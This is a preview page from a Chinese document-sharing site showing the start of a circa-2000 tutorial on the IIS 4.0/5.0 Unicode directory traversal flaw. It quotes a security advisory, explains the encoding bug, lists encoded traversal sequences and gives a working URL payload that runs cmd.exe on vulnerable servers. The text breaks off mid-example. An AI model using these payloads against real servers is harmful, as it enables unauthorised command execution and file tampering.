网站大量收购独家精品文档,联系QQ:2885784924

UNICODE编码漏洞全攻略-1.docVIP

  1. 1、本文档共15页,可阅读全部内容。
  2. 2、有哪些信誉好的足球投注网站(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
  3. 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  4. 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
  5. 5、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
  6. 6、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们
  7. 7、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
  8. 8、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
UNICODE编码漏洞全攻略-1

UNICODE编码漏洞全攻略-1 UNICODE编码漏洞全攻略-1 badboy 这并不是什么权威教材,只适合菜鸟了解win9x、NT存在的不安全面,切莫用此方法在国内做尝试,如果你偏要如此,那么由此引起的一切法律后果由你自己负责。本文只允许在网络任意转载,但须保留文章的完整性,如把本文作为经济目的使用,或者未经本人许可进行印刷、光盘杂志、等出版性质的行为,本人将保留侵权控告的权利。 2000年10月17日中联绿盟发布了以下的安全公告: 微软IIS 4.0 / 5.0 扩展UNICODE目录遍历漏洞 远程漏洞:是 本地漏洞:是 发布日期:2000年10月17日 更新日期:2000年10月17日 受影响的版本: Microsoft IIS 5.0 + Microsoft Windows NT 2000 Microsoft IIS 4.0 + Microsoft Windows NT 4.0 + Microsoft BackOffice 4.5 - Microsoft Windows NT 4.0 + Microsoft BackOffice 4.0 - Microsoft Windows NT 4.0 不受影响的版本: 漏洞描述: 微软IIS 4.0和5.0都存在利用扩展UNICODE字符取代/和\而能利用../目录遍历的漏洞。未经授权的用户可能利用IUSR_machinename账号的上下文空间访问任何已知的文件。该账号在默认情况下属于Everyone 和Users组的成员,因此任何与Web根目录在同一逻辑驱动器上的能被这些用户组访问的文件都能被删除, 修改或执行,就如同一个用户成功登陆所能完成的一样。 测试方法:(以下的程序或方法可能具有攻击性,如用于非法用途,后果自负!) puter/scripts/..%c1%1c../path/solo.txt %c0%af = / %c1%9c = 解决方案: 该漏洞补丁随微软安全公告MS00-057一起发布 ( /technet/security/bulletin/ms00-057.asp) 可以从如下地址下载补丁: IIS 4.0 /ntserver/nts/downloads/critical/q269862/default.asp IIS 5.0 /windows2000/downloads/critical/q269862/default.asp (以上为原文) 该漏洞一发布后,紧接而来的是众多NT网络服务器惨遭黑手,可以说,到目前为止,网络里仍存在此漏洞的NT服务器至少有30%,而这些站点的管理员是白痴还是认为该漏洞不值得注意??看来是不曾被黑不落泪,NT站的管理员们,看完以下的方法,你快点给你的NT服务器打补丁吧。 一、UNICODE漏洞的原理 此漏洞从中文IIS4.0+SP6开始,还影响中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1, 台湾繁体中文也同样存在这样的漏洞。 中文版的WIN2000中,UNICODE编码 存在BUG,在UNICODE 编码中 %c1%1c -〉 (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = ‘/‘ %c0%2f -〉 (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = ‘\‘ 在NT4中/编码为%c1%9c 在英文版里: WIN2000英文版%c0%af 但从国外某些站点得来的资料显示,还有以下的编码可以实现对该漏洞的检测,具体情况本人未做详细的证实: %c1%pc %c0%9v %c0%qf %c1%8s %e0%80%af %f0%80%80%af %fc%80%80%80%80%af 或许是什么日文版、韩文版之类,win2000 Terminal版有兴趣的朋友可以试试。 二、UNICODE漏洞的检测 以下均以中文版WIN2K为例,如果是其他NT版本,按上面所述的编码替换以下代码中的%c1%1c 最简单的检测方法: 比如说有一IP地址为X.X.X.X的WIN2K主机,我们可以在地址栏输入 x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir 如果存在此漏洞的话,我们便可以看到以下的内容:(例子假设SCRIPTS目录里无文件) Directory of C:\inetpub\scripts 2000-09-28 15:49 〈DIR〉 . 2000-09-28 15:49 〈DIR〉 .. 这是我们在很多经验交谈中常看到大家使用的方法,实际上我们也可以改为这样 /scripts/..%c1%1c../winnt/system32/cmd.exe?/

文档评论(0)

panguoxiang + 关注
实名认证
文档贡献者

该用户很懒,什么也没介绍

1亿VIP精品文档

相关文档